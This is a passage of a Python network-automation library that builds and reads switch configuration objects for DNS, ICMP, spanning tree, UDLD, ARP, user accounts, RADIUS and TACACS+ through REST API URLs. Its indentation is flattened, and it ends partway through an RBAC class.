:return Dns object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
obj = 'dnsEntity'
query_url = '/api/node/mo/sys/dns.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
dns= DNS()
admin_st = ret[obj]['attributes']['adminSt']
dns.set_admin_st(admin_st)
if ret[obj].get('children'):
for child in ret[obj]['children']:
prof_name = str(child['dnsProf']['attributes']['name'])
dns_profile = DnsProfile()
dns_profile.set_prof_name(prof_name)
if child['dnsProf'].get('children'):
provider = child['dnsProf']['children']
for data in provider:
if data.get('dnsProvider'):
dns_profile = cls._get_provider(data,
profile=dns_profile)
elif data.get('dnsDomExt'):
dns_profile = cls._get_domain_ext(data,
profile=dns_profile)
elif data.get('dnsDom'):
dns_profile =cls._get_domain(data,
profile=dns_profile)
elif data.get('dnsHost'):
host_name = str(data['dnsHost']['attributes']
['name'])
for version in data['dnsHost']['children']:
if version.get('dnsIpv4Host'):
ipv4 = str(version['dnsIpv4Host']
['attributes']['addr'])
host = DnsHost(host_name, ipv4)
elif version.get('dnsIpv6Host'):
ipv6 = str(version['dnsIpv6Host']
['attributes']['addr'])
host = DnsHost(host_name, ipv6)
dns_profile.add(host)
elif data.get('dnsVrf'):
vrf_name = str(data['dnsVrf']['attributes']
['name'])
vrf = DnsVrf(vrf_name)
for obj in data['dnsVrf']['children']:
if obj.get('dnsProvider'):
vrf = cls._get_provider(obj, vrf=vrf)
elif obj.get('dnsDomExt'):
vrf = cls._get_domain_ext(obj,
vrf=vrf)
elif obj.get('dnsDom'):
vrf = cls._get_domain(obj, vrf=vrf)
dns_profile.add(vrf)
dns.add_profile(dns_profile)
return dns
class ICMP(BaseNXObject):
"""
This defines the Icmp configuration
"""
def __init__(self, version, interface, ctrl=None, session=None,
parent=None):
super(ICMP, self).__init__(name="")
self._session= session
self._parent = parent
if version not in ['v4', 'v6']:
raise TypeError
self.version = 'icmp%sIf' % (version)
self.interface = interface
self.ctrl = ctrl
self.status = None
self.id = None
def _get_attributes(self):
att = {}
if self.ctrl in ['', 'redirect']:
att['ctrl'] = self.ctrl
return att
def get_json(self):
"""
:returns: json response object
"""
return super(ICMP, self).get_json(obj_class=self.version,
attributes=self._get_attributes())
def get_url(self):
""" Return Icmp url """
return ('/api/node/mo/sys/%s/inst/dom-default/if-[%s].json' %
(self.version.replace('If', ''), self.interface.if_name))
def _set_status(self, status):
self.status = status
def _set_id(self, id):
self.id = id
@classmethod
def _get(cls, session, query_url, version, icmps):
resp = session.get(query_url).json()['imdata']
if version == 'v4':
cls.version = 'icmpv4If'
elif version == 'v6':
cls.version = 'icmpv6If'
for ret in resp:
id = str(ret[cls.version]['attributes']['id'])
icmp = ICMP(version, id)
icmp._set_id(id)
if str(ret[cls.version]['attributes']['ctrl']) == 'redirect':
icmp._set_status('enabled')
else:
icmp._set_status('disabled')
icmp.version = cls.version[:6]
icmps.append(icmp)
@classmethod
def get(cls, session, version=None):
"""
:param session: Session object to communicate with Switch
:return list of icmp object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
icmps = []
if version == 'v4':
query_url = '/api/node/class/icmpv4If.json'
cls._get(session, query_url, version, icmps)
elif version == 'v6':
query_url = '/api/node/class/icmpv6If.json'
cls._get(session, query_url, version, icmps)
elif version == None:
query_url1 = '/api/node/class/icmpv4If.json'
cls._get(session, query_url1, 'v4', icmps)
query_url2 = '/api/node/class/icmpv6If.json'
cls._get(session, query_url2, 'v6', icmps)
return icmps
class StpMst(BaseNXObject):
"""
This class defines STP Mst Entity configuration
"""
def __init__(self, session=None, parent=None):
super(StpMst, self).__init__(name="")
self._session= session
self._parent = parent
self.msten_obj = 'stpMstEntity'
self.simulate = None
self.hello_time = None
self.fwd_delay = None
self.max_age = None
def set_simulate(self, simulate):
self.simulate = simulate
def set_hello_time(self, hello_time):
''' Currently not able to configure '''
self.hello_time = hello_time
def set_fwd_delay(self, fwd_delay):
''' Currently not able to configure '''
self.fwd_delay = fwd_delay
def set_max_age(self, max_age):
''' Currently not able to configure '''
self.max_age = max_age
def _get_attributes(self):
att = {}
if self.simulate:
att['simulate'] = self.simulate
return att
def get_json(self):
return super(StpMst, self).get_json(obj_class=self.msten_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Mst Entity url """
return '/api/mo/sys/stp/inst/mstent.json'
class StpVlan(BaseNXObject):
"""
This class defines STP Vlan configuration
"""
def __init__(self, id, session=None, parent=None):
super(StpVlan, self).__init__(name="")
self._session= session
self._parent = parent
self.vlan_obj = 'stpVlan'
self.id = id
self.admin_st = None
self.bdg_priority = None
self.protocol = None
self.root_priority = None
self.root_addr = None
self.root_cost = None
self.root_port_no = None
self.bdg_addr = None
self.hello_time = None
self.fwd_delay = None
self.max_age = None
def set_admin_st(self, admin_st):
self.admin_st = admin_st
def set_protocol(self, protocol):
''' Currently not able to configure '''
self.protocol = protocol
def set_root_pri(self, priority):
''' Currently not able to configure '''
self.root_priority = priority
def set_root_addr(self, address):
''' Currently not able to configure '''
self.root_addr = address
def set_root_cost(self, cost):
''' Currently not able to configure '''
self.root_cost = cost
def set_root_port_no(self, port_no):
''' Currently not able to configure '''
self.root_port_no = port_no
def set_bdg_addr(self, address):
''' Currently not able to configure '''
self.bdg_addr = address
def set_hello_time(self, hello_time):
''' Currently not able to configure '''
self.hello_time = hello_time
def set_fwd_delay(self, fwd_delay):
''' Currently not able to configure '''
self.fwd_delay = fwd_delay
def set_max_age(self, max_age):
''' Currently not able to configure '''
self.max_age = max_age
def _set_bdg_priority(self, priority):
self.bdg_priority = priority
def set_bdg_priority(self, priority):
if not int(priority) in range (0, 61440):
if int(priority)%4096 != 0:
raise TypeError('Bridge priority must be multiple of 4096')
else:
raise TypeError('Bridge priority must be in range <0-61440>')
self.bdg_priority = str(int(self.id) + int(priority))
def _get_attributes(self):
att = {}
att['id'] = self.id
if self.admin_st:
att['adminSt'] = self.admin_st
if self.admin_st == 'enabled':
att['bridgePriority'] = self.bdg_priority
return att
def get_json(self):
"""
:returns: json response object
"""
return super(StpVlan, self).get_json(obj_class=self.vlan_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Vlan url """
return '/api/mo/sys/stp/inst/vlan-%s.json'% self.id
class StpInterface(BaseNXObject):
"""
This class defines STP Interface configuration
"""
def __init__(self, id, session=None, parent=None):
super(StpInterface, self).__init__(name="")
self._session= session
self._parent = parent
self.if_obj = 'stpIf'
self.id = id
self.mode = 'default'
self.cost = None
self.priority = None
def set_mode(self, mode):
self.mode = mode
def set_cost(self, cost):
self.cost = cost
def set_priority(self, priority):
self.priority = priority
def _get_attributes(self):
att = {}
att['id'] = self.id.if_name
if self.mode:
att['mode'] = self.mode
return att
def get_json(self):
return super(StpInterface, self).get_json(obj_class=self.if_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Interface url """
return '/api/mo/sys/stp/inst/if-[%s].json'% self.id
class STP(BaseNXObject):
"""
This class defines STP configuration
"""
def __init__(self, session=None, parent=None):
super(STP, self).__init__(name="")
self._session= session
self._parent = parent
self.stp_obj = 'stpInst'
self.mode = None
self.port_type = 'normal'
self.msts = []
self.i_faces = []
self.vlans = []
def set_mode(self, mode):
self.mode = mode
def _set_port_type(self, port_type):
self.port_type = port_type
def add_port_type(self, port_type):
if port_type in ['bpdufilter', 'bpduguard']:
self.port_type += ',' + 'extchp-' + port_type[:4] + '-' + \
port_type[4:]
elif port_type == 'edge':
if "network" in self.port_type:
self.port_type = self.port_type.replace('network',
'extchp-edge')
else:
self.port_type += ',' + 'extchp-' + port_type[:4]
elif port_type == 'network':
if "edge" in self.port_type:
self.port_type = self.port_type.replace('extchp-edge',
'network')
else:
self.port_type += ',' + port_type
else:
raise TypeError("provide proper mode")
def add(self, stp_obj=None):
self._children.append(stp_obj)
if isinstance(stp_obj, StpMst):
self.msts.append(stp_obj)
if isinstance(stp_obj, StpInterface):
self.i_faces.append(stp_obj)
if isinstance(stp_obj, StpVlan):
self.vlans.append(stp_obj)
def _get_attributes(self):
att = {}
att['ctrl'] = self.port_type
if self.mode:
att['mode'] = self.mode
return att
def get_json(self):
return super(STP, self).get_json(obj_class=self.stp_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Stp Interface url """
return '/api/mo/sys/stp/inst.json'
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return Dns object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
stp_obj = 'stpInst'
query_url = '/api/mo/sys/stp/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
stp = STP()
mode = ret[stp_obj]['attributes']['mode']
port_type = ret[stp_obj]['attributes']['ctrl']
stp.set_mode(mode)
stp._set_port_type(port_type)
if ret[stp_obj].get('children'):
for child in ret[stp_obj]['children']:
if child.get('stpMstEntity'):
mst_att = child['stpMstEntity']['attributes']
stp_mst = StpMst()
stp_mst.set_simulate(str(mst_att['simulate']))
stp_mst.set_hello_time(str(mst_att['helloTime']))
stp_mst.set_fwd_delay(str(mst_att['fwdTime']))
stp_mst.set_max_age(str(mst_att['maxAge']))
stp.add(stp_mst)
elif child.get('stpVlan'):
vlan_att = child['stpVlan']['attributes']
stp_vlan = StpVlan(str(vlan_att['id']))
stp_vlan.set_admin_st(str(vlan_att['adminSt']))
stp_vlan.set_protocol(str(vlan_att['protocol']))
stp_vlan.set_root_pri(str(vlan_att['rootPriority']))
stp_vlan.set_root_addr(str(vlan_att['rootAddress']))
stp_vlan.set_root_cost(str(vlan_att['rootPathCost']))
stp_vlan.set_root_port_no(str(vlan_att['rootPort'
'Number']))
stp_vlan._set_bdg_priority(str(vlan_att['bridge'
'Priority']))
stp_vlan.set_bdg_addr(str(vlan_att['bridgeAddress']))
stp_vlan.set_hello_time(str(vlan_att['helloTime']))
stp_vlan.set_max_age(str(vlan_att['maxAge']))
stp_vlan.set_fwd_delay(str(vlan_att['fwdTime']))
stp.add(stp_vlan)
elif child.get('stpIf'):
int_att = child['stpIf']['attributes']
stp_i_face = StpInterface(str(int_att['id']))
stp_i_face.set_mode(str(int_att['mode']))
stp_i_face.set_cost(str(int_att['cost']))
stp_i_face.set_priority(str(int_att['priority']))
stp.add(stp_i_face)
return stp
class UDLD(BaseNXObject):
"""
This class defines UDLD configuration
"""
def __init__(self, session=None):
super(UDLD, self).__init__(name="")
self._session= session
self.udld_obj = 'udldInst'
self.udld_int_obj = 'udldPhysIf'
self.aggress = None
self.int_aggress = None
self.i_face = None
self.int_aggresses = []
self.i_faces = []
self.g_msg_int = None
def enable_aggress(self, i_face=None):
'''
If i_face not specified enables global aggress
If not, enables aggress of particular interface
'''
if not i_face:
self.aggress = 'enabled'
else:
self.int_aggress = 'enabled'
self.i_face = i_face
def disable_aggress(self, i_face=None):
'''
If i_face not specified disables global aggress
If not, disables aggress of particular interface
'''
if not i_face:
self.aggress = 'disabled'
else:
self.int_aggress = 'disabled'
self.i_face = i_face
def set_g_msg_int(self, msg_int):
self.g_msg_int = msg_int
def _get_attributes(self):
att = {}
if self.aggress:
att['aggressive'] = self.aggress
return att
def _get_child_attributes(self):
child = []
if self.int_aggress:
child.append({self.udld_int_obj:
{"attributes":
{'aggressive': self.int_aggress,
'id': self.i_face.if_name}}})
return child
def get_json(self):
return super(UDLD, self).get_json(obj_class=self.udld_obj,
attributes=self._get_attributes(),
children=self._get_child_attributes())
def get_url(self):
""" Return Udld url """
return '/api/mo/sys/udld/inst.json'
def _get_interface_details(self, resp):
udld_int_obj = 'udldPhysIf'
udld_int_attr = resp[udld_int_obj]['attributes']
aggress = str(udld_int_attr['aggressive'])
id = str(udld_int_attr['id'])
self.int_aggresses.append(aggress)
self.i_faces.append(id)
@classmethod
def get(cls, session, interface=None):
"""
:param session: Session object to communicate with Switch
:return UDLD object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
udld_obj = 'udldInst'
udld = UDLD()
if interface:
query_url = ('/api/mo/sys/udld/inst/physif-[eth1/2].json?rsp-sub'
'tree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
udld._get_interface_details(ret)
else:
query_url = '/api/mo/sys/udld/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
udld_att = ret[udld_obj]['attributes']
msg_int = str(udld_att['msgIntvl'])
udld.set_g_msg_int(msg_int)
aggress = str(udld_att['aggressive'])
if aggress == 'enabled':
udld.enable_aggress()
else:
udld.disable_aggress()
if ret[udld_obj].get('children'):
for child in ret[udld_obj]['children']:
udld._get_interface_details(child)
return udld
class ARP(BaseNXObject):
"""
This class defines ARP configuration
"""
def __init__(self, session=None):
super(ARP, self).__init__(name="")
self._session= session
self.arp_obj = 'arpInst'
self.timeout = '1500'
def set_timeout(self, time):
self.timeout = time
def _get_attributes(self):
att = {}
att['timeout'] = self.timeout
return att
def get_json(self):
return super(ARP, self).get_json(obj_class=self.arp_obj,
attributes=self._get_attributes())
def get_url(self):
""" Return Arp url """
return '/api/mo/sys/arp/inst.json'
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return ARP object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
arp_obj = 'arpInst'
arp = ARP()
query_url = '/api/mo/sys/arp/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
arp_att = ret[arp_obj]['attributes']
arp.set_timeout(str(arp_att['timeout']))
return arp
class AaaRole(BaseNXObject):
"""
This class defines Role Creation
"""
def __init__(self, name, session=None):
super(AaaRole, self).__init__(name)
self.role_obj = 'aaaRole'
self.name = name
def _get_attributes(self):
att = {}
att['name'] = self.name
return att
def get_delete_url(self, name):
""" Return Delete Role url """
return '/api/node/mo/sys/userext/role-'+ name +'.json'
def get_url(self):
""" Return Role url """
return '/api/node/mo/sys/userext/role-'+ self.name +'.json'
def get_json(self):
return super(AaaRole, self).get_json(obj_class=self.role_obj,
attributes=self._get_attributes())
class AaaUserRole(BaseNXObject):
"""
This class defines User Role configuration
"""
def __init__(self, name, user_role, session=None):
super(AaaUserRole, self).__init__(name)
self._session= session
self.role_obj = 'aaaUserRole'
self.domain_obj = 'aaaUserDomain'
self.user_role = user_role
self.name = name
def _get_child_attributes(self):
child = []
child.append({self.role_obj: {"attributes":
{"name": self.user_role}}})
return child
def _get_attributes(self):
att = {}
att['name'] = 'all'
att['dn'] = 'sys/userext/user-' + self.name + '/userdomain-all'
return att
def get_delete_url(self, user_name, role):
""" Return Delete User Role url """
return ('/api/node/mo/sys/userext/user-' + user_name + '/userdomain-'
'all/role-' + role + '.json')
def get_url(self):
""" Return User Role url """
return ('/api/node/mo/sys/userext/user-' + self.name + '/userdomain-'
'all/role-' + self.user_role + '.json')
def get_json(self):
return super(AaaUserRole, self).get_json(obj_class=self.domain_obj,
attributes=self._get_attributes(),
children=self._get_child_attributes())
class AaaUser(BaseNXObject):
"""
This class defines User configuration
"""
def __init__(self, name, password=<PASSWORD>, role='network-operator',
ssh_key=None, session=None, parent=None):
super(AaaUser, self).__init__(name)
self._session= session
self._parent = parent
self.user_obj = 'aaaUser'
self.name = name
if password:
self.password = password
self.ssh_key = ssh_key
self._set_role(role)
self.user_roles = []
def _set_role(self, role):
user_role = AaaUserRole(self.name, role)
self._children.append(user_role)
def set_role(self, role):
self.role = role
self.user_roles.append(role)
def set_ssh_key(self, key):
self.ssh_key = key
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.password:
att['pwd'] = self.password
att['pwdSet'] = 'yes'
else:
att['pwdSet'] = 'no'
return att
def _get_child_attributes(self):
child = []
if self.ssh_key:
ssh = {"aaaSshAuth": {"attributes": {'data': self.ssh_key}}}
child.append(ssh)
return child
def get_url(self):
""" Return User url """
return '/api/node/mo/sys/userext/user-' + self.name + '.json'
def get_json(self):
return super(AaaUser, self).get_json(obj_class=self.user_obj,
attributes=self._get_attributes(),
children=self._get_child_attributes())
@classmethod
def get(cls, session, username):
"""
:param session: Session object to communicate with Switch
:return User object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
user_obj = 'aaaUser'
query_url = ('/api/node/mo/sys/userext/user-' + username +
'.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
user_att = ret[user_obj]['attributes']
user = AaaUser(str(user_att['name']))
children = ret[user_obj]['children']
for child in children:
if child.get('aaaUserDomain'):
for roles in child['aaaUserDomain']['children']:
user.set_role(str(roles['aaaUserRole']['attributes']
['name']))
elif child.get('aaaSshAuth'):
user.set_ssh_key(str(child['aaaSshAuth']['attributes']
['data']))
return user
class AaaRadiusProvider(BaseNXObject):
"""
This class defines Radius-server host configuration
"""
def __init__(self, name, key=None, key_enc=None, retries=None,
timeout=None, session=None, parent=None):
super(AaaRadiusProvider, self).__init__(name)
self._session= session
self._parent = parent
self.rad_prov_obj = 'aaaRadiusProvider'
self.name = name
self.key = key
self.key_enc = key_enc
self.retries = retries
self.timeout = timeout
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.timeout:
att['timeout'] = self.timeout
if self.retries:
att['retries'] = self.retries
return att
def get_delete_url(self, host_name):
""" Return Delete Radius-server host url """
return ('/api/node/mo/sys/userext/radiusext/radiusprovider-' +
host_name + '.json')
def get_url(self):
""" Return Radius-server host url """
return ('/api/node/mo/sys/userext/radiusext/radiusprovider-' +
self.name + '.json')
def get_json(self):
return super(AaaRadiusProvider, self).get_json(
obj_class=self.rad_prov_obj,
attributes=self._get_attributes())
class AaaRadius(BaseNXObject):
"""
This class defines Radius-server configuration
"""
def __init__(self, session=None, parent=None):
super(AaaRadius, self).__init__(name="")
self._session= session
self._parent = parent
self.radius_obj = 'aaaRadiusEp'
self.retries = None
self.timeout = None
self.src_int = None
self.key = None
self.key_enc = None
self.servers = []
def set_retries(self, retries):
self.retries = retries
def set_timeout(self, timeout):
self.timeout = timeout
def set_key(self, key, key_enc=None):
self.key = key
if key_enc:
self.key_enc = key_enc
def set_src_interface(self, src_int):
self.src_int = src_int
def add_host(self, name, key=None, key_enc=None, retries=None,
timeout=None):
host = AaaRadiusProvider(name, key, key_enc, retries, timeout)
self._children.append(host)
self.servers.append(host)
def _get_attributes(self):
att = {}
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.src_int:
att['srcIf'] = self.src_int
if self.timeout:
att['timeout'] = self.timeout
if self.retries:
att['retries'] = self.retries
return att
def get_url(self):
""" Return Radius-server url """
return '/api/node/mo/sys/userext/radiusext.json'
def get_json(self):
return super(AaaRadius, self).get_json(obj_class=self.radius_obj,
attributes=self._get_attributes())
@classmethod
def get(cls, session, host_name=None):
"""
:param session: Session object to communicate with Switch
:return Radius object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
rad_obj = 'aaaRadiusEp'
rad_prov_obj = 'aaaRadiusProvider'
radius = AaaRadius()
if host_name:
query_url = ('/api/node/mo/sys/userext/radiusext/radiusprovider-'
+ host_name + '.json')
resp = session.get(query_url).json()['imdata']
for ret in resp:
prov_att = ret[rad_prov_obj]['attributes']
radius.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
retries=str(prov_att['retries']))
else:
query_url = ('/api/node/mo/sys/userext/radiusext.json?rsp-subtree'
'=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rad_att = ret[rad_obj]['attributes']
radius.set_retries(str(rad_att['retries']))
radius.set_timeout(str(rad_att['timeout']))
radius.set_src_interface(str(rad_att['srcIf']))
children = ret[rad_obj]['children']
for g_child in children:
if g_child.get(rad_prov_obj):
prov_att = g_child[rad_prov_obj]['attributes']
radius.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
retries=str(prov_att['retries']))
return radius
class AaaTacacsProvider(BaseNXObject):
"""
This class defines Tacacs+ server host configuration
"""
def __init__(self, name, key=None, key_enc=None, port=None,
timeout=None, session=None, parent=None):
super(AaaTacacsProvider, self).__init__(name)
self._session= session
self._parent = parent
self.tac_prov_obj = 'aaaTacacsPlusProvider'
self.name = name
self.key = key
self.key_enc = key_enc
self.port = port
self.timeout = timeout
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.timeout:
att['timeout'] = self.timeout
if self.port:
att['port'] = self.port
return att
def get_delete_url(self, host_name):
""" Return Delete Tacacs+ server host url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovider-' +
host_name + '.json')
def get_url(self):
""" Return Tacacs+ server host url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovider-' +
self.name + '.json')
def get_json(self):
return super(AaaTacacsProvider, self).get_json(
obj_class=self.tac_prov_obj,
attributes=self._get_attributes())
class AaaProviderRef(BaseNXObject):
"""
This class defines Tacacs+ server group configuration
"""
def __init__(self, name, server, session=None):
super(AaaProviderRef, self).__init__(name)
self._session = session
self.prov_ref_obj = 'aaaProviderRef'
self.name = name
self.server = server
def _get_attributes(self):
att = {}
att['name'] = self.server
return att
def get_delete_url(self, group_name, server):
""" Return Delete Tacacs+ server group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ group_name + '/providerref-' + server + '.json')
def get_url(self):
""" Return Tacacs+ server group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ self.name + '/providerref-' + self.server + '.json')
def get_json(self):
return super(AaaProviderRef, self).get_json(
obj_class=self.prov_ref_obj,
attributes=self._get_attributes())
class AaaTacacsProviderGroup(BaseNXObject):
"""
This class defines Tacacs+ group configuration
"""
def __init__(self, name, vrf=None, deadtime=None, server=None,
session=None, parent=None):
super(AaaTacacsProviderGroup, self).__init__(name)
self._session= session
self._parent = parent
self.tac_prov_grp_obj = 'aaaTacacsPlusProviderGroup'
self.name = name
self.vrf = vrf
self.deadtime = deadtime
self.server = server
self.grp_servers = []
self._create_server_host(name, server)
def _create_server_host(self, grp_name, server):
ref = AaaProviderRef(grp_name, server)
self._children.append(ref)
self.grp_servers.append(ref)
def _get_attributes(self):
att = {}
att['name'] = self.name
if self.vrf:
att['vrf'] = self.vrf
if self.deadtime:
att['deadtime'] = self.deadtime
return att
def get_delete_url(self, group_name):
""" Return Delete Tacacs+ group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ group_name + '.json')
def get_url(self):
""" Return Tacacs+ group url """
return ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovidergroup-'
+ self.name + '.json')
def get_json(self):
return super(AaaTacacsProviderGroup, self).get_json(
obj_class=self.tac_prov_grp_obj,
attributes=self._get_attributes())
class AaaTacacs(BaseNXObject):
"""
This class defines Tacacs+ server configuration
"""
def __init__(self, session=None, parent=None):
super(AaaTacacs, self).__init__(name="")
self._session= session
self._parent = parent
self.tacacs_obj = 'aaaTacacsPlusEp'
self.deadtime = None
self.timeout = None
self.src_int = None
self.key = None
self.key_enc = None
self.servers = []
self.groups = []
def set_deadtime(self, deadtime):
self.deadtime = deadtime
def set_timeout(self, timeout):
self.timeout = timeout
def set_key(self, key, key_enc=None):
self.key = key
if key_enc:
self.key_enc = key_enc
def set_src_interface(self, src_int):
self.src_int = src_int
def add_host(self, name, key=None, key_enc=None, port=None,
timeout=None):
host = AaaTacacsProvider(name, key, key_enc, port, timeout)
self._children.append(host)
self.servers.append(host)
def add_group(self, name, vrf=None, deadtime=None, server=None):
group = AaaTacacsProviderGroup(name, vrf, deadtime, server)
self._children.append(group)
self.groups.append(group)
def _get_attributes(self):
att = {}
if self.key:
att['key'] = self.key
if self.key_enc:
att['keyEnc'] = self.key_enc
if self.src_int:
att['srcIf'] = self.src_int
if self.timeout:
att['timeout'] = self.timeout
if self.deadtime:
att['deadtime'] = self.deadtime
return att
def get_url(self):
""" Return Tacacs+ server url """
return '/api/node/mo/sys/userext/tacacsext.json'
def get_json(self):
return super(AaaTacacs, self).get_json(obj_class=self.tacacs_obj,
attributes=self._get_attributes())
def _get_grp_info(self, resp, tacacs):
tac_grp_obj = 'aaaTacacsPlusProviderGroup'
grp_att = resp[tac_grp_obj]['attributes']
if resp[tac_grp_obj].get('children'):
g_children = resp[tac_grp_obj]['children']
for gg_child in g_children:
if gg_child.get('aaaProviderRef'):
server = str(gg_child['aaaProviderRef']['attributes']
['name'])
if server:
tacacs.add_group(name=str(grp_att['name']),
vrf=str(grp_att['vrf']),
deadtime=str(grp_att['deadtime']),
server=server)
else:
tacacs.add_group(name=str(grp_att['name']),
vrf=str(grp_att['vrf']),
deadtime=str(grp_att['deadtime']))
@classmethod
def get(cls, session, host_name=None, grp_name=None):
"""
:param session: Session object to communicate with Switch
:return Tacacs object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if host_name and grp_name:
raise TypeError('Provider either hostname or groupname')
tac_obj = 'aaaTacacsPlusEp'
tac_prov_obj = 'aaaTacacsPlusProvider'
tac_grp_obj = 'aaaTacacsPlusProviderGroup'
tacacs = AaaTacacs()
if host_name:
query_url = ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovid'
'er-' + host_name + '.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
prov_att = ret[tac_prov_obj]['attributes']
tacacs.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
port=str(prov_att['port']))
elif grp_name:
query_url = ('/api/node/mo/sys/userext/tacacsext/tacacsplusprovid'
'ergroup-' + grp_name + '.json?rsp-subtree=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
tacacs._get_grp_info(ret, tacacs)
else:
query_url = ('/api/node/mo/sys/userext/tacacsext.json?rsp-subtree'
'=full')
resp = session.get(query_url).json()['imdata']
for ret in resp:
tac_att = ret[tac_obj]['attributes']
tacacs.set_deadtime(str(tac_att['deadtime']))
tacacs.set_timeout(str(tac_att['timeout']))
tacacs.set_src_interface(str(tac_att['srcIf']))
children = ret[tac_obj]['children']
for child in children:
if child.get(tac_prov_obj):
prov_att = child[tac_prov_obj]['attributes']
tacacs.add_host(name=str(prov_att['name']),
timeout=str(prov_att['timeout']),
port=str(prov_att['port']))
elif child.get(tac_grp_obj):
tacacs._get_grp_info(child, tacacs)
return tacacs
class AaaAaa(BaseNXObject):
"""
This class defines User AAA configuration
"""
def __init__(self, session=None, parent=None):
super(AaaAaa, self).__init__(name='')
self._session= session
self._parent = parent
self.aaa_obj = 'aaaAuthRealm'
self.errEn = None
self.auth_protocol = None
self.auth_prov_grp = None
self.cmd_type = 'exec'
self.author_prov_grp = None
self.acc_prov_grp = None
def enable_auth_login(self, login_data):
if login_data == 'error-enable':
self.errEn = 'yes'
elif login_data == 'ascii-authentication':
self.auth_protocol = 'ascii'
def disable_auth_login(self, login_data):
if login_data == 'error-enable':
self.errEn = 'no'
elif login_data == 'ascii-authentication':
self.auth_protocol = 'pap'
def set_auth_default_grp(self, name=None):
if name:
self.auth_prov_grp = name
else:
self.auth_prov_grp = ''
def set_author_default_grp(self, name=None, cmd_type=None):
if name:
self.author_prov_grp = name
else:
self.author_prov_grp = ''
if cmd_type in ['config', 'exec']:
self.cmd_type = cmd_type
def set_acc_default_grp(self, name=None):
if name:
self.acc_prov_grp = name
else:
self.acc_prov_grp = ''
def _get_child_attributes(self):
child = []
auth = {"aaaDefaultAuth":{"attributes":{}}}
auth['aaaDefaultAuth']['attributes'][
'authProtocol'] = self.auth_protocol
auth['aaaDefaultAuth']['attributes'][
'errEn'] = self.errEn
auth['aaaDefaultAuth']['attributes'][
'providerGroup'] = self.auth_prov_grp
child.append(auth)
author = {"aaaDefaultAuthor":{"attributes": {}}}
author['aaaDefaultAuthor']['attributes'][
'cmdType'] = self.cmd_type
author['aaaDefaultAuthor']['attributes'][
'providerGroup'] = self.author_prov_grp
child.append(author)
acc = {"aaaDefaultAcc": {"attributes": {}}}
acc['aaaDefaultAcc']['attributes'][
'providerGroup'] = self.acc_prov_grp
child.append(acc)
return child
def get_url(self):
""" Return AAA url """
return '/api/node/mo/sys/userext/authrealm.json'
def get_json(self):
return super(AaaAaa, self).get_json(obj_class=self.aaa_obj,
attributes={},
children=self._get_child_attributes())
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
:return AAA object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
aaa_obj = 'aaaAuthRealm'
aaa = AaaAaa()
query_url = '/api/node/mo/sys/userext/authrealm.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
aaa_child = ret[aaa_obj]['children']
for child in aaa_child:
if child.get('aaaDefaultAuth'):
auth_att = child['aaaDefaultAuth']['attributes']
if not auth_att['providerGroup']:
aaa.set_auth_default_grp(name='local')
else:
aaa.set_auth_default_grp(name=str(auth_att[
'providerGroup']))
if auth_att['authProtocol']=='ascii':
aaa.enable_auth_login('ascii-authentication')
else:
aaa.disable_auth_login('ascii-authentication')
if auth_att['errEn']=='yes':
aaa.enable_auth_login('error-enable')
else:
aaa.disable_auth_login('error-enable')
elif child.get('aaaDefaultAuthor'):
author_att = child['aaaDefaultAuthor']['attributes']
if not author_att['providerGroup']:
aaa.set_author_default_grp(name='local',
cmd_type=str(author_att['cmdType']))
else:
aaa.set_author_default_grp(
name=str(author_att['providerGroup']),
cmd_type=str(author_att['cmdType']))
elif child.get('aaaDefaultAcc'):
acc_att = child['aaaDefaultAcc']['attributes']
if not acc_att['providerGroup']:
aaa.set_acc_default_grp('local')
else:
aaa.set_acc_default_grp(name=str(acc_att
['providerGroup']))
return aaa
class RBAC(BaseNXObject):
"""
This class defines RBAC configuration
"""
def __init__(self, session=None, parent=None):
super(RBAC, self).__init__(name="")
self._session= session
self._parent = parent
self.rbac_obj = 'aaaUserEp'
